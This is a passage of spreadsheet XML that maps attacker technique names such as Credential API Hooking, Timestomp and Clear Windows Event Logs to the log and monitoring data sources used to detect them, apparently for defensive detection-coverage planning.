      <c r="B95" s="17" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,User interface,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C95" s="17" t="s">
        <v>93</v>
      </c>
      <c r="D95" s="17">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E95" s="17">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F95" s="13"/>
      <c r="G95" s="53" t="str">
        <f>VLOOKUP(A95,'REF-DataSources'!A:B,2)</f>
        <v>GUI Input Capture</v>
      </c>
    </row>
    <row r="96" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A96" s="55" t="s">
        <v>958</v>
      </c>
      <c r="B96" s="17" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C96" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D96" s="17">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E96" s="17">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F96" s="13"/>
      <c r="G96" s="53" t="str">
        <f>VLOOKUP(A96,'REF-DataSources'!A:B,2)</f>
        <v>Web Portal Capture</v>
      </c>
    </row>
    <row r="97" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A97" s="53" t="s">
        <v>962</v>
      </c>
      <c r="B97" s="17" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process monitoring,Loaded DLLs,DLL monitoring,Binary file metadata,API monitoring</v>
      </c>
      <c r="C97" s="17"/>
      <c r="D97" s="17">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E97" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F97" s="13"/>
      <c r="G97" s="53" t="str">
        <f>VLOOKUP(A97,'REF-DataSources'!A:B,2)</f>
        <v>Credential API Hooking</v>
      </c>
    </row>
    <row r="98" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A98" s="55" t="s">
        <v>135</v>
      </c>
      <c r="B98" s="17" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C98" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D98" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E98" s="17">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F98" s="13"/>
      <c r="G98" s="53" t="str">
        <f>VLOOKUP(A98,'REF-DataSources'!A:B,2)</f>
        <v>Process Discovery</v>
      </c>
    </row>
    <row r="99" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A99" s="53" t="s">
        <v>138</v>
      </c>
      <c r="B99" s="17" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,PowerShell logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C99" s="17"/>
      <c r="D99" s="17">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E99" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F99" s="13"/>
      <c r="G99" s="53" t="str">
        <f>VLOOKUP(A99,'REF-DataSources'!A:B,2)</f>
        <v>Command and Scripting Interpreter</v>
      </c>
    </row>
    <row r="100" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A100" s="53" t="s">
        <v>974</v>
      </c>
      <c r="B100" s="17" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process monitoring,Process command-line parameters,PowerShell logs,Loaded DLLs,File monitoring,DLL monitoring</v>
      </c>
      <c r="C100" s="17"/>
      <c r="D100" s="17">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E100" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F100" s="13"/>
      <c r="G100" s="53" t="str">
        <f>VLOOKUP(A100,'REF-DataSources'!A:B,2)</f>
        <v>PowerShell</v>
      </c>
    </row>
    <row r="101" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A101" s="53" t="s">
        <v>979</v>
      </c>
      <c r="B101" s="17" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C101" s="17"/>
      <c r="D101" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E101" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F101" s="13"/>
      <c r="G101" s="53" t="str">
        <f>VLOOKUP(A101,'REF-DataSources'!A:B,2)</f>
        <v>AppleScript</v>
      </c>
    </row>
    <row r="102" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A102" s="53" t="s">
        <v>983</v>
      </c>
      <c r="B102" s="17" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C102" s="17"/>
      <c r="D102" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E102" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F102" s="13"/>
      <c r="G102" s="53" t="str">
        <f>VLOOKUP(A102,'REF-DataSources'!A:B,2)</f>
        <v>Windows Command Shell</v>
      </c>
    </row>
    <row r="103" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A103" s="53" t="s">
        <v>988</v>
      </c>
      <c r="B103" s="17" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C103" s="17"/>
      <c r="D103" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E103" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F103" s="13"/>
      <c r="G103" s="53" t="str">
        <f>VLOOKUP(A103,'REF-DataSources'!A:B,2)</f>
        <v>Unix Shell</v>
      </c>
    </row>
    <row r="104" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A104" s="53" t="s">
        <v>993</v>
      </c>
      <c r="B104" s="17" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Loaded DLLs,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C104" s="17"/>
      <c r="D104" s="17">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E104" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F104" s="13"/>
      <c r="G104" s="53" t="str">
        <f>VLOOKUP(A104,'REF-DataSources'!A:B,2)</f>
        <v>Visual Basic</v>
      </c>
    </row>
    <row r="105" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A105" s="53" t="s">
        <v>999</v>
      </c>
      <c r="B105" s="17" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:C)</f>
        <v>System calls,Process monitoring,Process command-line parameters,API monitoring</v>
      </c>
      <c r="C105" s="17"/>
      <c r="D105" s="17">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E105" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F105" s="13"/>
      <c r="G105" s="53" t="str">
        <f>VLOOKUP(A105,'REF-DataSources'!A:B,2)</f>
        <v>Python</v>
      </c>
    </row>
    <row r="106" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A106" s="53" t="s">
        <v>1004</v>
      </c>
      <c r="B106" s="17" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,DLL monitoring,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C106" s="17"/>
      <c r="D106" s="17">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E106" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F106" s="13"/>
      <c r="G106" s="53" t="str">
        <f>VLOOKUP(A106,'REF-DataSources'!A:B,2)</f>
        <v>JavaScript/JScript</v>
      </c>
    </row>
    <row r="107" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A107" s="53" t="s">
        <v>1009</v>
      </c>
      <c r="B107" s="17" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network device run-time memory,Network device command history,Network device configuration</v>
      </c>
      <c r="C107" s="17"/>
      <c r="D107" s="17">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E107" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F107" s="13"/>
      <c r="G107" s="53" t="str">
        <f>VLOOKUP(A107,'REF-DataSources'!A:B,2)</f>
        <v>Network Device CLI</v>
      </c>
    </row>
    <row r="108" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A108" s="55" t="s">
        <v>141</v>
      </c>
      <c r="B108" s="17" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C108" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D108" s="17">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E108" s="17">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F108" s="13"/>
      <c r="G108" s="53" t="str">
        <f>VLOOKUP(A108,'REF-DataSources'!A:B,2)</f>
        <v>Graphical User Interface</v>
      </c>
    </row>
    <row r="109" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A109" s="55" t="s">
        <v>142</v>
      </c>
      <c r="B109" s="17" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:C)</f>
        <v>System calls</v>
      </c>
      <c r="C109" s="17">
        <v>100</v>
      </c>
      <c r="D109" s="17">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E109" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F109" s="13"/>
      <c r="G109" s="53" t="str">
        <f>VLOOKUP(A109,'REF-DataSources'!A:B,2)</f>
        <v>Hypervisor</v>
      </c>
    </row>
    <row r="110" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A110" s="55" t="s">
        <v>145</v>
      </c>
      <c r="B110" s="17" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C110" s="17" t="s">
        <v>146</v>
      </c>
      <c r="D110" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E110" s="17">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F110" s="13"/>
      <c r="G110" s="53" t="str">
        <f>VLOOKUP(A110,'REF-DataSources'!A:B,2)</f>
        <v>Scripting</v>
      </c>
    </row>
    <row r="111" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A111" s="55" t="s">
        <v>151</v>
      </c>
      <c r="B111" s="17" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,Application logs</v>
      </c>
      <c r="C111" s="17" t="s">
        <v>152</v>
      </c>
      <c r="D111" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E111" s="17">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F111" s="13"/>
      <c r="G111" s="53" t="str">
        <f>VLOOKUP(A111,'REF-DataSources'!A:B,2)</f>
        <v>Exploitation for Privilege Escalation</v>
      </c>
    </row>
    <row r="112" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A112" s="53" t="s">
        <v>153</v>
      </c>
      <c r="B112" s="17" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C112" s="17"/>
      <c r="D112" s="17">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
      <c r="E112" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F112" s="13"/>
      <c r="G112" s="53" t="str">
        <f>VLOOKUP(A112,'REF-DataSources'!A:B,2)</f>
        <v>Permission Groups Discovery</v>
      </c>
    </row>
    <row r="113" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A113" s="55" t="s">
        <v>1037</v>
      </c>
      <c r="B113" s="17" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C113" s="17" t="s">
        <v>78</v>
      </c>
      <c r="D113" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E113" s="17">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F113" s="13"/>
      <c r="G113" s="53" t="str">
        <f>VLOOKUP(A113,'REF-DataSources'!A:B,2)</f>
        <v>Local Groups</v>
      </c>
    </row>
    <row r="114" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A114" s="55" t="s">
        <v>1040</v>
      </c>
      <c r="B114" s="17" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C114" s="17" t="s">
        <v>78</v>
      </c>
      <c r="D114" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E114" s="17">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F114" s="13"/>
      <c r="G114" s="53" t="str">
        <f>VLOOKUP(A114,'REF-DataSources'!A:B,2)</f>
        <v>Domain Groups</v>
      </c>
    </row>
    <row r="115" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A115" s="53" t="s">
        <v>1043</v>
      </c>
      <c r="B115" s="17" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C115" s="17"/>
      <c r="D115" s="17">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
      <c r="E115" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F115" s="13"/>
      <c r="G115" s="53" t="str">
        <f>VLOOKUP(A115,'REF-DataSources'!A:B,2)</f>
        <v>Cloud Groups</v>
      </c>
    </row>
    <row r="116" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A116" s="55" t="s">
        <v>154</v>
      </c>
      <c r="B116" s="17" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</v>
      </c>
      <c r="C116" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D116" s="17">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E116" s="17">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F116" s="13"/>
      <c r="G116" s="53" t="str">
        <f>VLOOKUP(A116,'REF-DataSources'!A:B,2)</f>
        <v>Indicator Removal on Host</v>
      </c>
    </row>
    <row r="117" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A117" s="55" t="s">
        <v>1054</v>
      </c>
      <c r="B117" s="17" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C117" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D117" s="17">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E117" s="17">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F117" s="13"/>
      <c r="G117" s="53" t="str">
        <f>VLOOKUP(A117,'REF-DataSources'!A:B,2)</f>
        <v>Clear Windows Event Logs</v>
      </c>
    </row>
    <row r="118" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A118" s="53" t="s">
        <v>1060</v>
      </c>
      <c r="B118" s="17" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C118" s="17"/>
      <c r="D118" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E118" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F118" s="13"/>
      <c r="G118" s="53" t="str">
        <f>VLOOKUP(A118,'REF-DataSources'!A:B,2)</f>
        <v>Clear Linux or Mac System Logs</v>
      </c>
    </row>
    <row r="119" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A119" s="53" t="s">
        <v>1065</v>
      </c>
      <c r="B119" s="17" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,PowerShell logs,File monitoring,Authentication logs</v>
      </c>
      <c r="C119" s="17"/>
      <c r="D119" s="17">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E119" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F119" s="13"/>
      <c r="G119" s="53" t="str">
        <f>VLOOKUP(A119,'REF-DataSources'!A:B,2)</f>
        <v>Clear Command History</v>
      </c>
    </row>
    <row r="120" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A120" s="53" t="s">
        <v>1071</v>
      </c>
      <c r="B120" s="17" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Process command-line parameters,File monitoring</v>
      </c>
      <c r="C120" s="17"/>
      <c r="D120" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E120" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F120" s="13"/>
      <c r="G120" s="53" t="str">
        <f>VLOOKUP(A120,'REF-DataSources'!A:B,2)</f>
        <v>File Deletion</v>
      </c>
    </row>
    <row r="121" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A121" s="55" t="s">
        <v>1076</v>
      </c>
      <c r="B121" s="17" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C121" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D121" s="17">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E121" s="17">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F121" s="13"/>
      <c r="G121" s="53" t="str">
        <f>VLOOKUP(A121,'REF-DataSources'!A:B,2)</f>
        <v>Network Share Connection Removal</v>
      </c>
    </row>
    <row r="122" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A122" s="53" t="s">
        <v>1081</v>
      </c>
      <c r="B122" s="17" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C122" s="17"/>
      <c r="D122" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E122" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F122" s="13"/>
      <c r="G122" s="53" t="str">
        <f>VLOOKUP(A122,'REF-DataSources'!A:B,2)</f>
        <v>Timestomp</v>
      </c>
    </row>
    <row r="123" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A123" s="53" t="s">
        <v>155</v>
      </c>
      <c r="B123" s="17" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:C)</f>
        <v>DNS records,Network protocol analysis,Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C123" s="17"/>
      <c r="D123" s="17">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E123" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F123" s="13"/>
      <c r="G123" s="53" t="str">
        <f>VLOOKUP(A123,'REF-DataSources'!A:B,2)</f>
        <v>Application Layer Protocol</v>
      </c>
    </row>
    <row r="124" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A124" s="53" t="s">
        <v>1089</v>
      </c>
      <c r="B124" s="17" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C124" s="17"/>
      <c r="D124" s="17">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E124" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F124" s="13"/>
      <c r="G124" s="53" t="str">
        <f>VLOOKUP(A124,'REF-DataSources'!A:B,2)</f>
        <v>Web Protocols</v>
      </c>
    </row>
    <row r="125" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A125" s="53" t="s">
        <v>1094</v>
      </c>
      <c r="B125" s="17" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C125" s="17"/>
      <c r="D125" s="17">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E125" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F125" s="13"/>
      <c r="G125" s="53" t="str">
        <f>VLOOKUP(A125,'REF-DataSources'!A:B,2)</f>
        <v>File Transfer Protocols</v>
      </c>
    </row>
    <row r="126" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A126" s="53" t="s">
        <v>1098</v>
      </c>
      <c r="B126" s="17" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C126" s="17"/>
      <c r="D126" s="17">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E126" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F126" s="13"/>
      <c r="G126" s="53" t="str">
        <f>VLOOKUP(A126,'REF-DataSources'!A:B,2)</f>
        <v>Mail Protocols</v>
      </c>
    </row>
    <row r="127" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A127" s="53" t="s">
        <v>1101</v>
      </c>
      <c r="B127" s="17" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,DNS records,Process monitoring,Process use of network,Packet capture</v>
      </c>
      <c r="C127" s="17"/>
      <c r="D127" s="17">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E127" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F127" s="13"/>
      <c r="G127" s="53" t="str">
        <f>VLOOKUP(A127,'REF-DataSources'!A:B,2)</f>
        <v>DNS</v>
      </c>
    </row>
    <row r="128" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A128" s="55" t="s">
        <v>157</v>
      </c>
      <c r="B128" s="17" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</v>
      </c>
      <c r="C128" s="17" t="s">
        <v>158</v>
      </c>
      <c r="D128" s="17">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E128" s="17">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F128" s="13"/>
      <c r="G128" s="53" t="str">
        <f>VLOOKUP(A128,'REF-DataSources'!A:B,2)</f>
        <v>Software Deployment Tools</v>
      </c>
    </row>
    <row r="129" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A129" s="55" t="s">
        <v>160</v>
      </c>
      <c r="B129" s="17" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C129" s="17" t="s">
        <v>61</v>
      </c>
      <c r="D129" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E129" s="17">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F129" s="13"/>
      <c r="G129" s="53" t="str">
        <f>VLOOKUP(A129,'REF-DataSources'!A:B,2)</f>
        <v>Data Staged</v>
      </c>
    </row>
    <row r="130" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A130" s="55" t="s">
        <v>1114</v>
      </c>
      <c r="B130" s="17" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C130" s="17" t="s">
        <v>61</v>
      </c>
      <c r="D130" s="17">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E130" s="17">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F130" s="13"/>
      <c r="G130" s="53" t="str">
        <f>VLOOKUP(A130,'REF-DataSources'!A:B,2)</f>
        <v>Local Data Staging</v>
      </c>
    </row>
    <row r="131" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A131" s="55" t="s">
        <v>1117</v>
      </c>
      <c r="B131" s="17" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C131" s="17" t="s">
        <v>61</v>
      </c>
      <c r="D131" s="17">
        <f t="shared" ref="D131:D194" si="5">LEN(TRIM(B131))-LEN(SUBSTITUTE(TRIM(B131),",",""))+1</f>
        <v>3</v>
      </c>
      <c r="E131" s="17">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F131" s="13"/>
      <c r="G131" s="53" t="str">
        <f>VLOOKUP(A131,'REF-DataSources'!A:B,2)</f>
        <v>Remote Data Staging</v>
      </c>
    </row>
    <row r="132" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A132" s="53" t="s">
        <v>165</v>
      </c>
      <c r="B132" s="17" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:C)</f>
        <v>AWS CloudTrail logs,Stackdriver logs,Authentication logs,Process monitoring</v>
      </c>
      <c r="C132" s="17"/>
      <c r="D132" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E132" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F132" s="13"/>
      <c r="G132" s="53" t="str">
        <f>VLOOKUP(A132,'REF-DataSources'!A:B,2)</f>
        <v>Valid Accounts</v>
      </c>
    </row>
    <row r="133" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A133" s="53" t="s">
        <v>1127</v>
      </c>
      <c r="B133" s="17" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:C)</f>
        <v>AWS CloudTrail logs,Stackdriver logs,Authentication logs,Process monitoring</v>
      </c>
      <c r="C133" s="17"/>
      <c r="D133" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E133" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F133" s="13"/>
      <c r="G133" s="53" t="str">
        <f>VLOOKUP(A133,'REF-DataSources'!A:B,2)</f>
        <v>Default Accounts</v>
      </c>
    </row>
    <row r="134" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A134" s="55" t="s">
        <v>1132</v>
      </c>
      <c r="B134" s="17" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Process monitoring</v>
      </c>
      <c r="C134" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D134" s="17">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E134" s="17">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F134" s="13"/>
      <c r="G134" s="53" t="str">
        <f>VLOOKUP(A134,'REF-DataSources'!A:B,2)</f>
        <v>Domain Accounts</v>
      </c>
    </row>
    <row r="135" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A135" s="55" t="s">
        <v>1137</v>
      </c>
      <c r="B135" s="17" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C135" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D135" s="17">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E135" s="17">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F135" s="13"/>
      <c r="G135" s="53" t="str">
        <f>VLOOKUP(A135,'REF-DataSources'!A:B,2)</f>
        <v>Local Accounts</v>
      </c>
    </row>
    <row r="136" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A136" s="53" t="s">
        <v>1142</v>
      </c>
      <c r="B136" s="17" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Authentication logs,AWS CloudTrail logs,Stackdriver logs</v>
      </c>
      <c r="C136" s="17"/>
      <c r="D136" s="17">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E136" s="17">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F136" s="13"/>
      <c r="G136" s="53" t="str">
        <f>VLOOKUP(A136,'REF-DataSources'!A:B,2)</f>
        <v>Cloud Accounts</v>
      </c>
    </row>
    <row r="137" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A137" s="55" t="s">
        <v>169</v>
      </c>
      <c r="B137" s="17" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C137" s="17" t="s">
